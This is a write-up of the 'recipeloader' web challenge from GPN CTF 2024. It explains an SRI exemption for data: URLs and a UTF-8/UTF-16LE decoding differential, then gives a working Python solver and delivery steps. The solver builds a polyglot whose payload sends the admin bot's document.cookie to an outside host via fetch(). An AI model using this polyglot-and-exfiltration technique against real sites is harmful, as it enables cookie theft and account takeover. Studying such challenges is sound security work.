web / free / hard

recipeloader

gpn24

Task: a client page validates a fetched JS recipe = "..." assignment with acorn, then loads the same URL as a <script>, exempting data: URLs from SRI. Solution: build a UTF-8/UTF-16LE polyglot data: URL. The UTF-8 view passes acorn's string-literal check; the UTF-16LE view (honored when the URL is loaded as a <script>) runs fetch() to exfiltrate the admin bot's flag cookie.

$ ls tags/ techniques/
cookie_exfiltration  sri_bypass_via_static_scheme  fetch_vs_script_decoding_differential  utf16le_utf8_polyglot  ascii_nul_interleave  acorn_parser_bypass

recipeloader — GPN CTF 2024 (gpn24)

Description

You can load a javascript recipe pls no(w) xss

English summary: A client page (http://localhost:1337/) takes a ?url= parameter, fetch()es it, validates the text as a strict recipe = "..." assignment using the acorn parser, then injects the same URL as a <script src=url>. Non-static URL schemes (http/https) are bound by Subresource Integrity (SRI), but "static" schemes (data:, blob:, ...) are exempted. An admin bot stores the flag in a normal, non-HttpOnly, same-origin cookie named flag on localhost:1337 and then visits an attacker-supplied URL. Goal: get XSS to exfiltrate that cookie.

Analysis

The vulnerable load pattern (index.html)

async function runScript(url) {
  const txt = await fetch(url).then(r => r.text());
  if (!isRecipeAssignmentProgram(txt)) throw new Error("invalid recipe assignment program");
  const s = document.createElement("script");
  s.src = url;
  if (!isScriptStatic(url)) s.integrity = `sha256-${await sha256(txt)}`;
  document.head.appendChild(s);
}

This is a classic check-then-load (TOCTOU) pattern: the validated bytes (txt from fetch) and the executed bytes (whatever <script src=url> resolves to) are two independent loads. The only thing keeping them identical is the SRI integrity attribute.

  • isRecipeAssignmentProgram(src) runs acorn with sourceType:"script" and demands EXACTLY: body.length === 1, a single ExpressionStatement that is an AssignmentExpression with operator "=", left = Identifier named recipe, right = a string Literal or expression-free TemplateLiteral. In other words the text must be exactly recipe = "...".
  • isScriptStatic(url) parses the URL and looks at the protocol:
    • staticProtos = [data, blob, javascript, mailto, resource, ssh, tel] → no integrity.
    • nonstaticProtos = [file, ftp, http, https, urn, view-source, ws, wss] → integrity applied.
    • Unknown protocol → throws.
  • sha256() uses Uint8Array.prototype.toBase64() to build the SRI digest.
  • After load, show() does recipeTarget.textContent = recipe. Because the value is assigned through textContent, no direct HTML injection is possible; we genuinely need script execution.
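The decision described in the bullets above can be modeled in a few lines of Python. This is only a sketch of the logic as the writeup describes it, not the challenge's actual JavaScript: the names is_script_static and integrity_for are hypothetical, and hashing the UTF-8 encoding of the fetched text is an assumption about what sha256() does.

```python
import base64
import hashlib
from typing import Optional
from urllib.parse import urlsplit

# Protocol lists copied from the writeup's description of isScriptStatic().
STATIC_PROTOS = {"data", "blob", "javascript", "mailto", "resource", "ssh", "tel"}
NONSTATIC_PROTOS = {"file", "ftp", "http", "https", "urn", "view-source", "ws", "wss"}


def is_script_static(url: str) -> bool:
    """Return True for 'static' schemes, False for non-static, raise otherwise."""
    scheme = urlsplit(url).scheme.lower()
    if scheme in STATIC_PROTOS:
        return True
    if scheme in NONSTATIC_PROTOS:
        return False
    raise ValueError(f"unknown protocol: {scheme!r}")


def integrity_for(url: str, text: str) -> Optional[str]:
    """Model of the loader: static schemes get no SRI value at all."""
    if is_script_static(url):
        return None
    # Assumption: the page hashes the UTF-8 bytes of the validated text.
    digest = hashlib.sha256(text.encode("utf-8")).digest()
    return "sha256-" + base64.b64encode(digest).decode("ascii")


if __name__ == "__main__":
    print(integrity_for("https://example.com/r.js", 'recipe = "x"'))
    print(integrity_for("data:text/javascript,recipe%20%3D%20%22x%22", 'recipe = "x"'))
```

The second call prints None: for a data: URL nothing ties the validated text to the bytes the script element later executes.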

The bot (admin.js)

  • GET /bot/run requires typeof url === 'string' && url.startsWith('http://localhost:1337').
  • Headless chromium (playwright) goes to http://localhost:1337, runs document.cookie = "flag" + process.env.FLAG (cookie name is flag, value is the flag), then navigates to the attacker URL, waits 10s, logs document.cookie, closes.

So the flag is a normal same-origin cookie. Any JS executing on localhost:1337 can read it and exfiltrate it.

The key weakness — SRI exemption + decoding differential

For http:// and https:// URLs the SRI binding forces the validated text and the executed script to be byte-identical, so they cannot diverge. But data: is in staticProtos, so no integrity is enforced. We just need ONE byte sequence that:

  1. when decoded by fetch().text() → passes the strict recipe = "..." acorn check, and
  2. when executed by <script src=...> → is arbitrary JavaScript.

The differential that makes this possible:

  • fetch('data:...').text() decodes the body as UTF-8 and IGNORES the ;charset= parameter. Verified empirically: fetch('data:text/plain;charset=UTF-16LE,AB') returns the 2 ASCII chars A, B — not one UTF-16 code unit.
  • <script src="data:...;charset=UTF-16LE,..."> HONORS the charset and decodes the same bytes as UTF-16LE before executing. Verified: a UTF-16LE-encoded window.__ran='YES' ran when loaded as a charset=UTF-16LE script.

Same bytes, two decodings → a UTF-8/UTF-16LE polyglot.
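The effect of the two decoders on one byte sequence is easy to reproduce outside the browser. The snippet below is a minimal illustration using Python's codecs as stand-ins for the two browser code paths; it does not exercise fetch() or <script> itself.

```python
# The two bytes from the fetch() experiment above: 'A' (0x41) and 'B' (0x42).
ab = b"AB"
print(len(ab.decode("utf-8")))       # two characters in the UTF-8 view
print(len(ab.decode("utf-16le")))    # one code unit (U+4241) in the UTF-16LE view

# ASCII interleaved with NUL bytes: the building block of the polyglot.
raw = bytes([0x41, 0x00, 0x42, 0x00])
utf8_view = raw.decode("utf-8")      # stand-in for what fetch().text() yields
utf16_view = raw.decode("utf-16le")  # stand-in for the charset-honoring script load
print(repr(utf8_view))
print(repr(utf16_view))
```

In the UTF-8 view the NUL bytes survive as characters, which is harmless inside a string literal; in the UTF-16LE view they vanish into the high byte of each code unit.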

Solution

Polyglot construction

We force a UTF-8 prefix recipe =" (note the space before =) and fill the string body with ASCII characters interleaved with 0x00 NUL bytes. Acorn happily accepts raw NULs inside a string literal, so the UTF-8 view is a valid recipe = "<ascii+NULs>" assignment. In UTF-16LE each <asciichar>\x00 pair decodes to a clean ASCII char, so the UTF-16LE view reads as ordinary ASCII JavaScript.

Engineering constraints (all required):

  • Space before =. In UTF-16LE the bytes r e c i p e SP = " decode to a run of CJK code points (敲 楣 数 㴠 ...) that are all valid identifier characters, forming one valid JS identifier. Without the space, the 4th UTF-16 unit becomes U+223D (∽, a math symbol), which is not an identifier char and breaks the UTF-16 program.
  • Avoid " (0x22) and \ (0x5c) inside the UTF-8 string body — those bytes would prematurely close/escape the UTF-8 string literal. Use single quotes in the payload.
  • Parity / alignment. recipe =" is 9 bytes (odd). One filler byte 0x3d (=) is prepended to the payload so that the prefix's quote byte pairs with it (0x22 0x3d → U+3D22, a valid identifier-continue char), which keeps the leading identifier syntactically valid; the rest then sits on even byte boundaries for clean ASCII+NUL interleaving. A trailing space byte is added before the closing " if needed to keep the total length even. With this prefix and filler it always is needed, because 9 + 1 + 1 plus an even-length interleaved payload is odd. The resulting final pair (0x20 0x22 → U+2220, ∠) falls inside the UTF-16 // comment.
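The alignment constraints above can be checked by decoding the prefix both ways. This is a small sketch; Python's str.isidentifier() is used only as a rough proxy for JavaScript's identifier rules, which is an assumption (the two rule sets are close but not identical).

```python
def code_points(raw: bytes) -> list:
    """Decode raw bytes as UTF-16LE and list the resulting code points."""
    return [f"U+{ord(ch):04X}" for ch in raw.decode("utf-16le")]


# Prefix with the space, plus the one-byte '=' filler: 10 bytes, 5 code units.
with_space = b'recipe ="' + b"="
# Prefix without the space: 8 bytes, 4 code units.
without_space = b'recipe="'

good = with_space.decode("utf-16le")
bad = without_space.decode("utf-16le")

print(code_points(with_space))     # ends with U+3D20, U+3D22 (CJK Extension A)
print(code_points(without_space))  # ends with U+223D (math symbol)
print(good.isidentifier(), bad.isidentifier())
```

With the space and filler, every code unit lands in a CJK block and the run forms one identifier; without the space, the last unit is the math symbol that breaks it.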

Final UTF-16LE program that actually runs:

敲楣数㴠㴢=fetch('//<EXFIL_HOST>?'+document.cookie)//∠

In sloppy/script mode this assigns the fetch(...) result to an implicit global (allowed), and the trailing // comments out the leftover units (the closing-quote byte etc). The fetch leaks document.cookie to the attacker host.

Both views were validated programmatically: the UTF-8 view passes the exact acorn recipe = "..." predicate; the UTF-16LE view parses as a syntactically valid sloppy-mode script.
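A rough offline version of that two-view check might look like the following. It is a sketch under stated assumptions: the regex only approximates the acorn predicate (it does not parse JavaScript), the helper names build_polyglot and utf8_view_ok are hypothetical, and example.invalid is a placeholder host.

```python
import re

# Approximation of the predicate: exactly one `recipe = "..."` assignment whose
# string body has no quote, backslash, or raw line break. This is NOT acorn.
RECIPE_RE = re.compile(r'recipe\s*=\s*"[^"\\\r\n]*"\s*;?\s*')


def build_polyglot(js: str) -> bytes:
    """Wrap ASCII JavaScript so it reads as a recipe string in UTF-8."""
    assert js.isascii(), "payload must be pure ASCII"
    assert not set(js) & set('"\\\r\n'), 'no ", backslash, or newline allowed'
    # 9-byte prefix + 1 filler byte, then each ASCII char followed by NUL.
    body = b'recipe ="' + b"=" + js.encode("utf-16le")
    # Space + closing quote keeps the total length even.
    return body + b' "'


def utf8_view_ok(raw: bytes) -> bool:
    """True if the UTF-8 decoding matches the approximate recipe pattern."""
    return RECIPE_RE.fullmatch(raw.decode("utf-8")) is not None


if __name__ == "__main__":
    raw = build_polyglot("=fetch('//example.invalid?'+document.cookie)//")
    print("UTF-8 view accepted:", utf8_view_ok(raw))
    print("UTF-16LE view:", raw.decode("utf-16le"))
```

The UTF-16LE view still has to be checked with a real JavaScript parser or a browser; this sketch only makes the decoded program visible for inspection.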

Reusable solver — gen_payload.py

#!/usr/bin/env python3
import sys, urllib.parse

EXFIL = sys.argv[1] if len(sys.argv) > 1 else "EXFILHOST/exfil"
TARGET = "http://localhost:1337/"

def utf16_ascii(s):
    out = bytearray()
    for ch in s:
        c = ord(ch)
        assert c < 128, ch
        out += bytes([c, 0])
    return bytes(out)

pre = b'recipe ="'  # space before = is required for UTF-16 alignment
payload = "=fetch('//" + EXFIL + "?'+document.cookie)//"  # no " or \ allowed
content = bytes([0x3d]) + utf16_ascii(payload)
body = pre + content
full = body + b'"'
if len(full) % 2 != 0:
    full = body + b' "'

enc = ''.join('%%%02X' % b for b in full)
data_url = 'data:text/javascript;charset=UTF-16LE,' + enc
attack_url = TARGET + '?url=' + urllib.parse.quote(data_url, safe='')
bot_url = 'http://localhost:1337/bot/run?url=' + urllib.parse.quote(attack_url, safe='')

print("UTF-8 view:", full.decode('utf-8'))
print("UTF-16 view:", full.decode('utf-16le'))
print("DATA URL:\n" + data_url)
print("ATTACK URL:\n" + attack_url)
print("BOT URL:\n" + bot_url)

Delivery / exploitation steps

  1. Generate the data: URL with an exfil host whose incoming requests you can read (I used webhook.site and created a token via POST https://webhook.site/token).
  2. Build the attack URL: http://localhost:1337/?url=<urlencoded data: URL>. It starts with http://localhost:1337, so it passes the bot's startsWith check.
  3. Submit to the bot: GET https://<instance>/bot/run?url=<urlencoded attack URL> → bot replies ok.
  4. The bot sets cookie flag+FLAG on localhost:1337, then visits the attack URL. The page fetch()es the data: URL (UTF-8 → valid recipe, passes validation, no SRI because data: is "static"), then loads the same data: URL as a <script>. That load honors charset=UTF-16LE, so it executes the UTF-16 payload and fetches //webhook/?<document.cookie>.
  5. Poll the webhook; received ...?flagGPNCTF{url_p4RSIN6_15_HArd_EVEN_FOr_BrOw5ers} (cookie name flag + flag value).
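The two layers of URL encoding in steps 2 and 3 are easy to get wrong, so here is a small sketch that builds the bot URL and confirms the nesting round-trips. The function name make_bot_url and the host instance.invalid are hypothetical placeholders; the real instance hostname is not given in this writeup.

```python
from urllib.parse import parse_qs, quote, urlsplit

TARGET = "http://localhost:1337/"


def make_bot_url(instance_base: str, data_url: str) -> str:
    """Nest data: URL -> attack URL -> bot URL, encoding once per layer."""
    attack_url = TARGET + "?url=" + quote(data_url, safe="")
    # Mirrors the bot's own check on the submitted URL.
    assert attack_url.startswith("http://localhost:1337")
    return instance_base.rstrip("/") + "/bot/run?url=" + quote(attack_url, safe="")


if __name__ == "__main__":
    data_url = "data:text/javascript;charset=UTF-16LE,%72%00"
    bot = make_bot_url("https://instance.invalid", data_url)
    # Peel the layers back off to confirm nothing was double- or under-encoded.
    attack = parse_qs(urlsplit(bot).query)["url"][0]
    inner = parse_qs(urlsplit(attack).query)["url"][0]
    print(bot)
    print(inner == data_url)
```

Each layer is percent-encoded exactly once, so the percent-escapes inside the data: URL reach the page intact after the bot endpoint and the page's own ?url= parsing have each decoded one layer.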

The flag text itself confirms the bug class: "url parsing is hard even for browsers."
